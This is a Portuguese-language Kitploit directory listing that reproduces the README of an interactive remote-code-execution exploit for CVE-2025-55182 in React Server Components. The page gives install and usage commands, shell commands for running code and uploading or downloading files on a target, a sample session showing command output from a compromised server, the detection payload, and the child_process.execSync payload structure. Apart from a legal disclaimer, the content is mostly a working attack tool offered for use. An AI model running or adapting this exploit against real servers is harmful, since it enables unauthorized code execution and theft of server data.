Skip to content
KitploitKITPLOIT
FerramentasBlog
Enviar
FerramentasBlog
Enviar

Ferramentas de Hacking, PenTest e Cibersegurança para o seu Arsenal de Segurança!

Kitploit é um diretório de ferramentas de hacking, cibersegurança e pentesting. Descubra as últimas atualizações de projetos para encontrar vulnerabilidades, analisar sistemas, automatizar testes e fortalecer sua segurança.

··Feeds·Contato·Privacidade·© 2026 Kitploit

Diretório de Ferramentas

Categorias

Ver todas as categorias
Loading categories
CVE-2025-55182-shellinteractive — Exploit RCE interativo para CVE-2025-55182 direcionado à vulnerabilidade de desserialização de Server Components do Next.js/React. Possui detecção automática, execução de comandos, transferência de arquivos e um shell integrado com histórico e autocompletar. | Kitploit
Ferramentas/GitHubGitHub/mrr0b0t19/cve-2025-55182-shellinteractive
Geração de PayloadsAnálise de VulnerabilidadesExploraçãoExploração de Aplicações WebTestes de PenetraçãoComando e ControleFerramenta de Acesso Remoto
GitHubmrr0b0t19/cve-2025-55182-shellinteractive

Mais Populares

Ver todos →

Descubra as ferramentas mais usadas pela nossa comunidade.

Explore todas as ferramentas

Navegue pela nossa coleção de ferramentas

Ver todas as ferramentas →
Compartilhar

CVE-2025-55182-shellinteractive

Exploit RCE interativo para CVE-2025-55182 direcionado à vulnerabilidade de desserialização de Server Components do Next.js/React. Possui detecção automática, execução de comandos, transferência de arquivos e um shell integrado com histórico e autocompletar.

Ver Repositório
213há 8 mesesRevisado pelo Kitploit

CVE-2025-55182-shellinteractive

Base utilizada de: https://github.com/Emiyelbarto/CVE-2025-55182-PoC Muito obrigado pela grande contribuição.

Visão Geral

CVE-2025-55182 é uma vulnerabilidade de desserialização no Next.js/React Server Components que permite que atacantes remotos não autenticados executem código arbitrário nos servidores afetados. A vulnerabilidade decorre do manuseio inadequado de dados serializados nas React Server Actions.

Recursos principais:

  • ✅ Shell interativo com histórico de comandos e autocompletar
  • ✅ Detecção automática de vulnerabilidades
  • ✅ Execução remota de comandos
  • ✅ Capacidades de upload/download de arquivos
  • ✅ Suíte de testes integrada
  • ✅ Parâmetros de alvo configuráveis

Instalação

Pré-requisitos

  • Python 3.8 ou superior
  • Biblioteca requests

Configuração rápida

root@kitploit:~
# Clone o repositório
git clone https://github.com/yourusername/hokma.git
cd hokma

# Instale as dependências
pip install requests

# Torne o script executável (opcional)
chmod +x hokma.py

Uso

Uso básico

root@kitploit:~
# Iniciar shell interativo
python hokma.py

# Verificar vulnerabilidade apenas
python hokma.py -u http://target.com --check

# Executar comando único
python hokma.py -u http://target.com -c "whoami"

Comandos do Shell Interativo

root@kitploit:~
help                    Show this help message
set URL <url>          Set target URL
set ID <action_id>     Set action ID (default: user-profile-action)
show                   Show current options
check [url]            Check if target is vulnerable
exploit <command>      Execute command on target
shell                  Start interactive command shell
test                   Run test commands (id, whoami, etc.)
upload <loc> <rem>     Upload local file to target
download <rem> <loc>   Download remote file (base64 encoded)
clear                  Clear screen
exit/quit              Exit the shell

Exemplo de Sessão

root@kitploit:~
$ python hokma.py

  ____                 _     ____  _          _ _ 
 |  _ \ ___  __ _  ___| |_  / ___|| |__   ___| | |
 | |_) / _ \/ _` |/ __| __| \___ \| '_ \ / _ \ | |
 |  _ <  __/ (_| | (__| |_   ___) | | | |  __/ | |
 |_| \_\___|\__,_|\___|\__| |____/|_| |_|\___|_|_|
                                                  
 React Server Components RCE Exploit (CVE-2025-55182)
Interactive Shell - Type 'help' for commands

hokma> set URL http://vulnerable-app.com
[+] URL set to: http://vulnerable-app.com

hokma> check
[*] Checking vulnerability on target: http://vulnerable-app.com...
[+] TARGET IS VULNERABLE!

hokma> exploit whoami
[*] Executing command: whoami
[*] Server responded with status: 200

--- COMMAND OUTPUT ---
www-data
----------------------

hokma> shell
[*] Starting reverse shell. Use 'exit' to return.
[*] Enter commands to execute on target:
cmd> pwd
[*] Executing command: pwd

--- COMMAND OUTPUT ---
/var/www/html
----------------------
cmd> exit

Opções de Configuração

OpçãoPadrãoDescrição
URL do AlvoNenhumURL da aplicação vulnerável
ID da Açãouser-profile-actionID da Server Action a ser alvo

Detalhes Técnicos

Detecção de Vulnerabilidade

A ferramenta envia uma requisição multipart especialmente criada que desencadeia uma falha em sistemas vulneráveis:

  • Usa o payload: ["$1:a:a"] com um objeto vazio {}
  • Detecta a vulnerabilidade por meio de respostas HTTP 500 ou padrões de erro específicos

Mecanismo de Exploração

  1. Construção do Payload JavaScript: Cria um script Node.js usando o construtor Function
  2. Execução de Processo Filho: Usa child_process.execSync() para executar comandos do sistema
  3. Extração de Resposta: Captura e exibe a saída do comando

Estrutura do Payload

root@kitploit:~
const cmd = "COMMAND";
return import('child_process').then(cp => {
    try {
        const output = cp.execSync(cmd).toString();
        return output;
    } catch(e) { 
        return "Command Execution Failed: " + e.message; 
    }
});

Uso Ético & Aviso Legal

AVISO LEGAL IMPORTANTE

Esta ferramenta destina-se a:

  • Testes de segurança autorizados
  • Fins educacionais
  • Pesquisa de vulnerabilidades com consentimento adequado

NÃO use esta ferramenta contra sistemas que você não possui ou não tem permissão explícita para testar. O acesso não autorizado a sistemas de computador é ilegal e antiético.

Os desenvolvedores não são responsáveis por qualquer uso indevido desta ferramenta. Os usuários devem cumprir todas as leis aplicáveis e obter a devida autorização antes de testar.

Limitações Conhecidas

  1. Requisitos do Alvo:

    • Servidor Node.js com React Server Components
    • Vulnerável ao CVE-2025-55182
    • Módulo de processo filho disponível
  2. Limitações de Detecção:

    • Pode produzir falsos positivos/negativos
    • Depende de respostas de erro específicas
  3. Restrições de Exploração:

    • Comandos executam com privilégios do processo do servidor
    • A saída pode ser truncada em alguns casos
    • Comandos complexos podem exigir escaping especial
Baixar ferramenta
Tempo limite
3 segundos
Tempo limite de requisição